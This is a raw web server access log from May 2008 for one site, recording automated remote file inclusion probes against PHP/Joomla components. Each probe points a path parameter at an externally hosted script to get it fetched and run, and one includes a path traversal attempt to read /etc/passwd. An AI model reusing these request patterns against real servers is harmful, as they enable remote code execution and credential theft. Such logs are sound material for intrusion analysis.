83.222.128.178 - - [02/May/2008:09:28:38 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:28:43 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:28:43 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:29:17 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:29:20 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:29:21 -0700] "GET /logs/access_080225.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:29:23 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:29:23 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:29:24 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:29:30 -0700] "GET /logs/access_080315.log//classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:29:30 -0700] "GET //classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:29:31 -0700] "GET /logs/access_080321.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:29:31 -0700] "GET /logs//classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:29:37 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:29:37 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:29:37 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:29:45 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:29:45 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.243.4 - - [02/May/2008:09:29:51 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.243.4 - - [02/May/2008:09:29:55 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.21 - - [02/May/2008:09:29:55 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.21 - - [02/May/2008:09:29:55 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.21 - - [02/May/2008:09:29:56 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:30:04 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:30:09 -0700] "GET /logs//classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:30:09 -0700] "GET //classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:30:12 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:30:24 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:30:33 -0700] "GET /logs/access_080227.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:30:36 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:30:39 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:30:39 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:30:57 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:30:57 -0700] "GET /logs/access_080218.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:31:01 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:31:02 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:31:05 -0700] "GET /logs/access_080315.log//classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:31:05 -0700] "GET //classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:31:05 -0700] "GET /logs//classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.22.107 - - [02/May/2008:09:31:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.9.25 - - [02/May/2008:09:31:09 -0700] "GET /logs/access_071225.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:31:36 -0700] "GET /logs/access_080218.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:31:37 -0700] "GET /logs/access_080225.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:31:38 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:31:38 -0700] "GET //ashnews.php?pathtoashnews=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:31:38 -0700] "GET /logs//cutenews/inc/shows.inc.php?cutepath=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:31:38 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:31:40 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:31:41 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:31:44 -0700] "GET //cutenews/inc/shows.inc.php?cutepath=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:31:45 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:31:45 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:31:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:31:54 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:31:57 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:31:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:32:11 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:32:18 -0700] "GET //classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:32:22 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:32:22 -0700] "GET //ashnews.php?pathtoashnews=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:32:25 -0700] "GET /logs//classified_right.php?language_dir=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:09:32:28 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:32:33 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:32:34 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:32:34 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:32:34 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:09:32:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:09:32:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:32:45 -0700] "GET /logs/!scanhttp://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:32:45 -0700] "GET /!scanhttp://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.246.51.45 - - [02/May/2008:09:33:04 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:33:16 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:33:21 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:33:21 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:33:38 -0700] "GET //appserv/main.php?appserv_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:34:00 -0700] "GET /logs//appserv/main.php?appserv_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.22.74.155 - - [02/May/2008:09:34:12 -0700] "GET /blog/index.php/feed HTTP/1.1" 200 6205 "-" "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9" "dmulk.com"
66.221.79.151 - - [02/May/2008:09:34:17 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:34:17 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:34:17 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:34:30 -0700] "GET /logs/access_080219.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:34:31 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:34:31 -0700] "GET //includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:34:34 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:34:40 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:34:40 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:34:43 -0700] "GET /logs/access.log//browse.php/header.php?prefix=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:09:34:44 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:34:44 -0700] "GET //browse.php/header.php?prefix=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:09:34:44 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:34:44 -0700] "GET /logs//browse.php/header.php?prefix=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:35:01 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:35:02 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.26 - - [02/May/2008:09:35:02 -0700] "GET /logs/access_080412.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:35:02 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:35:02 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:35:18 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:35:26 -0700] "GET /logs/!scanhttp://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:35:26 -0700] "GET /!scanhttp://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:35:38 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:35:38 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.11.23 - - [02/May/2008:09:35:43 -0700] "GET /logs/access.log/index.php?o=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:35:45 -0700] "GET /logs/access_080124.log/!scanhttp://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:35:46 -0700] "GET /!scanhttp://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:35:46 -0700] "GET /logs/!scanhttp://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.106.11.23 - - [02/May/2008:09:35:47 -0700] "GET /index.php?o=../../../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:47 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:47 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:48 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:48 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:48 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:48 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.11.23 - - [02/May/2008:09:35:49 -0700] "GET /logs/index.php?o=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:49 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:49 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:35:50 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.9.21 - - [02/May/2008:09:35:51 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:35:54 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:35:54 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.117 - - [02/May/2008:09:36:04 -0700] "GET /blog/wp-login.php HTTP/1.1" 200 1806 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
213.246.61.4 - - [02/May/2008:09:36:06 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:36:07 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:36:07 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:36:16 -0700] "GET /logs/access_071211.log//faqsupport/samplefaqsupport.php?path[docroot]=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:36:30 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
